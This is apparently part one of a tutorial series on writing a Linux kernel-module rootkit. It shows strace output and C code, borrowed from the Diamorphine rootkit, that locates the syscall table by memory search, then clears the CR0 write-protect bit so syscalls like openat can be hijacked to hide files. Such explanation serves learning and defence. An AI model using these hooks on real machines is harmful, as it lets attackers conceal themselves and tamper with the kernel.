Every technique used in this rootkit can be found on the internet. I am NOT responsible for any damage you might cause using my code.


what you will learn

  • what system calls are
  • how to hijack them

how to hook syscalls


to make the magic work, you have to deceive user space programs, which means controlling the interface between user space and the kernel, i.e. syscalls

take cat for example, how does it open the target file for reading?

$ strace cat /tmp/test
execve("/usr/bin/cat", ["cat", "/tmp/test"], 0x7ffc0ef32218 /* 29 vars */) = 0
brk(NULL)                               = 0x5564de58a000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=41793, ...}) = 0
mmap(NULL, 41793, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fe15ceaf000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260A\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1824496, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe15cead000
mmap(NULL, 1837056, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fe15ccec000
mprotect(0x7fe15cd0e000, 1658880, PROT_NONE) = 0
mmap(0x7fe15cd0e000, 1343488, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x22000) = 0x7fe15cd0e000
mmap(0x7fe15ce56000, 311296, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x16a000) = 0x7fe15ce56000
mmap(0x7fe15cea3000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1b6000) = 0x7fe15cea3000
mmap(0x7fe15cea9000, 14336, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fe15cea9000
close(3)                                = 0
arch_prctl(ARCH_SET_FS, 0x7fe15ceae540) = 0
mprotect(0x7fe15cea3000, 16384, PROT_READ) = 0
mprotect(0x5564de4d4000, 4096, PROT_READ) = 0
mprotect(0x7fe15cee1000, 4096, PROT_READ) = 0
munmap(0x7fe15ceaf000, 41793)           = 0
brk(NULL)                               = 0x5564de58a000
brk(0x5564de5ab000)                     = 0x5564de5ab000
openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=3031632, ...}) = 0
mmap(NULL, 3031632, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fe15ca07000
close(3)                                = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}) = 0
openat(AT_FDCWD, "/tmp/test", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=5, ...}) = 0
fadvise64(3, 0, 0, POSIX_FADV_SEQUENTIAL) = 0
mmap(NULL, 139264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe15c9e5000
read(3, "test\n", 131072)               = 5
write(1, "test\n", 5test
)                   = 5
read(3, "", 131072)                     = 0
munmap(0x7fe15c9e5000, 139264)          = 0
close(3)                                = 0
close(1)                                = 0
close(2)                                = 0
exit_group(0)                           = ?
+++ exited with 0 +++

the core part:

openat(AT_FDCWD, "/tmp/test", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=5, ...}) = 0
fadvise64(3, 0, 0, POSIX_FADV_SEQUENTIAL) = 0
mmap(NULL, 139264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe15c9e5000
read(3, "test\n", 131072)               = 5
write(1, "test\n", 5test
)                   = 5

more specifically, it's the openat syscall that gets the target file for cat. so if we hook openat, we can tell cat that this file doesn't exist, or give it Permission denied


redirecting a syscall to a custom function is called hooking.

to do that, first we need to

find syscall table

basically it's about replacing syscalls with your own functions. in practice, you only modify the syscall table, which holds the addresses of all syscalls

once the target syscall's entry points to your custom function, all user space programs talk to your function instead of the real one

to do that, first we need to get the syscall table

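unsigned long*
get_syscall_table_bf(void)
{
    unsigned long* syscall_table;
    unsigned long int i;

    /* walk upwards from sys_close, one pointer-sized step at a time */
    for (i = (unsigned long int)sys_close; i < ULONG_MAX;
         i += sizeof(void*)) {
        syscall_table = (unsigned long*)i;

        /* a real table has sys_close's address in slot __NR_close */
        if (syscall_table[__NR_close] == (unsigned long)sys_close)
            return syscall_table;
    }
    return NULL;
}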

the above code is borrowed from diamorphine

several notes to keep in mind:

  • a syscall function returns long, so on failure it can hand back a negative value, i.e. -errno
  • syscall_table[__NR_close] is the close entry of the syscall_table array, where __NR_close is the syscall number (index) of close
  • the syscall table is an array of unsigned long, each element holding the address of the corresponding syscall

now i will explain what happens in the get_syscall_table_bf() function:

  1. we define syscall_table to hold the syscall table address that we eventually return
  2. sys_close is the address of the current close syscall, and it's the starting point of the search
  3. loop until i reaches ULONG_MAX, i.e. the largest unsigned long. in each iteration we treat (unsigned long*)i as a candidate syscall_table, and check whether it's valid by testing if syscall_table[__NR_close] equals the actual close syscall's address
  4. return as soon as we find a match

how does the search work?


$ sudo cat /boot/System.map-xxxx-generic | grep -e 'sys_call_table' -e 'sys_close'
ffffffff8125e8e0 T __ia32_sys_close
ffffffff8125ec70 T __x64_sys_close # `sys_close` address
ffffffff81c001e0 R sys_call_table # syscall table address
ffffffff81c015c0 R ia32_sys_call_table
ffffffff825985f0 t _eil_addr___ia32_sys_close
ffffffff82598600 t _eil_addr___x64_sys_close

we see that sys_call_table's address is greater than sys_close's, therefore by doing a search from sys_close to ULONG_MAX (the highest address possible), we are able to find sys_call_table

why close then? well, technically anything that resides lower than sys_call_table will do.

simply put, we just need some point to start from. as long as sys_call_table is in our search interval, we will find it without issue

note: since the syscall table is located at runtime rather than hardcoded, you only need to compile the LKM once for a given kernel

when syscall table is located, our next move is

alter syscall table


one does not simply modify the syscall table, because ffffffff81c001e0 R sys_call_table has an R, which means the symbol lives in a read-only data section

there are solutions, of course, please read this:

what is cr0 ?

there's a WP (write protect) bit in the cr0 control register:

When set, the CPU can't write to read-only pages when privilege level is 0

level 0 is where your LKM code (the kernel) lives, so by clearing cr0's WP bit, we get permission to ignore read-only

sounds really cool, but how do we do that?

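static unsigned long cr0; /* cr0 as saved at load time, WP still set */

/* restore the saved cr0, i.e. turn write protection back on
   (helper names here are assumed, the listing lost them) */
static inline void
protect_memory(void)
{
    write_cr0(cr0);
}

/* clear bit 16 (WP) so ring 0 may write to read-only pages */
static inline void
unprotect_memory(void)
{
    write_cr0(cr0 & ~0x00010000);
}

static int mod_init(void) {
    cr0 = read_cr0();

    /* hook some syscalls */

    return 0;
}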

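~0x00010000 has a 0 at bit 16 (the WP bit) and 1s everywhere else, so AND-ing cr0 with it clears only WP and leaves the other bits alone. we could OR the bit back in, of course, but since we already saved the value from read_cr0(), restoring cr0 is really easy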

okay, i guess i have covered the kernel hooking part. in 0x02, i'm gonna hook some syscalls to finish our LKM

